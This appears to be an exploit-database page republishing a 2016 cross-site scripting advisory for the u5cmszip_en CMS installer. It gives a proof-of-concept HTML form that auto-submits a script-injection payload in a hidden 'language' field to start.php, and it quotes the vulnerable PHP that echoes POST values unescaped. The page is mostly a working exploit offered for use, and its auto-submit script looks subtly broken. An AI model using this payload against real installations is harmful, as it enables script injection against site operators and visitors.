Home / os / win10

U5cmszip_en Cms Cross Site Scripting

Posted on 30 November -0001

<HTML><HEAD><TITLE>u5cmszip_en Cms Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|=============================================================|
|[+] Exploit Title:  u5cmszip_en Cms Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://yuba.ch/
|[+]
|[+] Download Link : http://yuba.ch/f.php?f=r/u5cmszip/u5cmszip_en.zip?t=1479045196
|[+]
|[+] Tested on:  Kali Linux 
|[+]
|[+] Date: 12 /27 / 2016
|=============================================================|
|[+] Exploit Code: 
 
<html>
<head><title>Cross Site Scripting</title></head>
<body>
<form action="http://127.0.0.1/3/CMS/install/start.php" method="post" name="installation_step0">
<select name="language" class="language">
    <option value="de">deutsch</option>
    <option value="en" selected="selected">english</option>
    <option value="es">spanish</option>
    </select>
    <input type="hidden" name="language" id="language" value="en'"()&%<acx><ScRiPt>alert(123)</ScRiPt>" />
    </form>
    <script language="Javascript">
        setTimeout('http://127.0.0.1/3/CMS/install/start.php.submit()', 1);
    </script>
     
</body>
</html>
============================================================
Vulnerable code :

<form action="step1.php" method="post" name="installation_step0">

<h4>Please choose a language | Bitte w&auml;hlen Sie eine Sprache | Porfavor elig&eacute; una idioma:</h4>

<select name="language" class="language">
    <?php
        $countries = shortTag_countries();
        foreach ($countries as $country => $iso) {
            print "<option value="{$iso}"" . (strtolower($iso) == $http_lang? 'selected="selected"': '') . ">"
                . htmlentities($country) . "</option>
";
        }
    ?>
</select>

<?php foreach ( $_POST as $key => $value ) { ?>
<?php if ( !strpos($key, 'password') ) { ?>
<input type="hidden" name="<?php echo $key ?>" id="<?php echo $key ?>" value="<?php echo $value ?>" />
<?php } } ?>

<input type="image" src="button_next.gif" alt="next" title="Next step" align="right" border="0" />

</form>

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : M.R.S.L.Y
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|</BODY></HTML>

 

TOP

Malware :

Exploits :